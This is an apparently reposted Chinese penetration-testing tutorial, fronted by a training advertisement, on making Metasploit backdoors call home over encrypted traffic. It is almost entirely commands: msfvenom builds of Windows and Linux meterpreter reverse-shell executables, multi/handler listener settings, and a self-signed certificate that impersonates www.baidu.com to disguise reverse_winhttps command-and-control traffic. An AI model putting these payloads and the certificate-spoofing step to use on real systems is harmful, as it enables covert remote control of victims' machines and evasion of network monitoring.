MSF监听之加密流量下的后门上线
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
#本文作者:Drunkbaby, 转载自FreeBuf。
原文链接:https://www.freebuf.com/articles/network/333934.html
仅供技术分享交流学习,侵权请联系我们删除。





msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.86.2 LPORT=12377 -f exe > yun.exe







msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.86.2 LPORT=12399 -f elf > yun.elf

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.86.2
lhost => 192.168.86.2
msf5 exploit(multi/handler) > set lport 12399
lport => 12399
msf5 exploit(multi/handler) >







openssl req -new -newkey rsa:4096 -days 365 -nodes -x509
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.baidu.com"
-keyout www.baidu.com.key
-out www.baidu.com.crt &&
cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem &&
rm -f www.baidu.com.key www.baidu.com.crt


msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.86.2 LPORT=4433 PayloadUUIDTracking=true HandlerSSLCert=www.baidu.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o zui.exe


msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.86.2 LPORT=4433 PayloadUUIDTracking=true HandlerSSLCert=www.baidu.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o zui.bat

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_winhttps
payload => windows/x64/meterpreter/reverse_winhttps
msf5 exploit(multi/handler) > set lhost 192.168.86.2
lhost => 192.168.86.2
msf5 exploit(multi/handler) > set lport 4433
lport => 4433
msf5 exploit(multi/handler) > set handlersslcert www.baidu.com.pem
handlersslcert => www.baidu.com.pem
msf5 exploit(multi/handler) > set stagerverifysslcert true











原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/5460.html